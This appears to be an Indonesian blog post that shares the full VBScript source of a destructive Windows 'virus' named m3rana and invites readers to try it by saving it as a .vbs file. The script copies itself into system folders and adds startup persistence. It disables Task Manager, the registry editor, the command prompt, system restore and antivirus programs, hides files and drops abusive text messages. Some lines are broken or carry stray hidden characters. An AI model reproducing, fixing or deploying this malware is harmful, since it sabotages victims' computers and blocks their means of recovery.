Virus m3rana by me&seseorang

Virus m3rana by me&seseorang

Code:
'm3rana.dll.vbs
On Error Resume Next
Dim hati, cinta, alin, selalu, dan, akan, ku, cium , kamu
Set hati = CreateObject("Wscript.Shell")
Set cinta = CreateObject ("Scripting.FileSystemObject")
Set alin = CreateObject ("Scripting.FileSystemObject")
Set selalu = alin.GetFile("WScript.ScriptFullName")
selalu.Copy("C:\WINDOWS\m3rana.dll.vbs")
selalu.Copy("C:\m3rana.dll.vbs")
selalu.Copy("D:\m3rana.dll.vbs")
selalu.Copy("C:\WINDOWS\system32\m3rana.dll.vbs")
hati.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\User",winpath&"\m3rana.dll.vbs"
hati.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Infected by m3rana"
hati.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
hati.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hi​dden", "1", "REG_DWORD"
hati.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hi​deFileExt", "1", "REG_DWORD"
hati.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Sh​owSuperHidden", "1", "REG_DWORD"
hati.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Su​perHidden", "1", "REG_DWORD"
hati.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDeskt ​op\NoChangingWallpaper", "1", "REG_DWORD"
hati.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Cl​eanShutdown", "1", "REG_DWORD"
hati.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Fa​ultTime", "1", "REG_DWORD"
hati.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\No​Find", "1", "REG_DWORD"
hati.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\No​FolderOptions", "1", "REG_DWORD"
hati.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\No​Run", "1", "REG_DWORD"
hati.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\No​CDBurning", "1", "REG_DWORD"
hati.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\No ​ViewContextMenu", "1", "REG_DWORD"
hati.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\No ​TrayContextMenu", "1", "REG_DWORD"
hati.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\No​WinKeys", "1", "REG_DWORD"
hati.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\No​Desktop", "1", "REG_DWORD"
hati.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\No ​TrayContextMenu", "1", "REG_DWORD"
hati.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Sh ​utdown_Settings", "1", "REG_DWORD"
hati.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Sy​stem", "1", "REG_DWORD"
hati.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\No​Drives", "67108863", "REG_DWORD"
hati.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\Disa​bleCMD", "1", "REG_DWORD"
hati.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\Disa ​bleRegistryTools", "1", "REG_DWORD"
hati.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\Disa​bleTaskMgr", "1", "REG_DWORD"
hati.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoSc​rSavPage", "1", "REG_DWORD"
hati.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDi​spCpl", "1", "REG_DWORD"
hati.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoClose", "1", "REG_DWORD"
hati.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoFileMenu", "1", "REG_DWORD"
hati.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoRun", "1", "REG_DWORD"
hati.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\N​​oLogOff", "1", "REG_DWORD"
hati.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\N​oControlPanel", "1", "REG_DWORD"
hati.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\N ​oFolderOptions", "1", "REG_DWORD"
hati.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System Monitoring", "1", "REG_DWORD"
hati.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNotic ​eCaption", "Infected by m3rana (Dim-Hacker)"
hati.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNotic ​eText", "Infected by m3rana (Dim-Hacker)"
hati.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Re.exe\Debugger",""
hati.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger",""
hati.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger",""
hati.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger",""
hati.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger",""
hati.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger",""
hati.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger",""
hati.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe\Debugger",""
hati.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe\Debugger",""
hati.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashAvast.exe\Debugger",""
hati.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger",""
hati.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger",""
hati.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger",""
hati.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger",""
hati.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32.exe\Debugger",""
hati.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32ku.exe\Debugger",""
hati.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Leg ​alNoticeCaption", "Infected by m3rana (Dim-Hacker)"
hati.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Leg​alNoticeText", "INFECTED !"
hati.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\LimitSystemRest ​​oreCheckpointing", "1", "REG_DWORD"
hati.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\DisableMSI", "1", "REG_DWORD"
hati.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "1", "REG_DWORD"
hati.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig", "1", "REG_DWORD"
Set cium = CreateObject ("Scripting.FileSystemObject")
Set kamu= cium.CreateTextFile("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Msg.txt")
kamu.WriteLine ("Aku Cinta Alin :C")
kamu.Close
Set akan= dan.CreateTextFile ("C:\Documents and Settings\All Users\Desktop\IkiCocormu.txt")
akan.WriteLine ("Hai Orang Bnyak Bacot! Aku Hacker Mengucapkan salam hangat untuk kamu!")
akan.WriteLine ("Mulutmu Bau seperti Mulut Kudanil")
akan.WriteLine ("Kau tau,Mulutmu Jorok Kotor seperti toilet dan jamban")
akan.WriteLine ("Mulutmu Banyak Dosa,Mulutmu tak berarti")
akan.WriteLine ("Hai Anak Orang gila")
akan.WriteLine ("Aku Hacker Ingin Memberi Ucapan Terbaik Untukmu")
akan.WriteLine ("Penjilat,Tolol,Bodoh,Cuih...")
akan.WriteLine ("Najis,Mulutmu seperti mulut :gukguk")
akan.WriteLine ("Dasar Kau Shit")
akan.WriteLine (":kata_kotor: You")
akan.WriteLine ("By Hacker donpo")
akan.WriteLine ("Infected By cocod")
akan.WriteLine ("Infected By cocod")
akan.WriteLine ("Infected By cocod")
akan.WriteLine ("Infected By cocod")
akan.WriteLine ("Infected By cocod")
akan.WriteLine ("Infected By cocod")
akan.WriteLine ("Infected By cocod")
akan.Close
Set akan = WScript.CreateObject ("WScript.Shell")
akan.Run ("C:\WINDOWS\m3rana.vbs")

dim fso, myself,mytext
set fso = createobject("scripting.filesystemobject")
set myself = fso.opentextfile(wscript.scriptfullname)
mytext = myself.readall
myself.close
do

if fso.fileexists(wscript.scriptfullname) = false then

set myself = fso.createtextfile(wscript.scriptfullname)
myself.write mytext
myself.close

end if

loop



di coba dlu aja. buat dengan notepad simpan dengan ekstensi .vbs

Post a Comment

0 Comments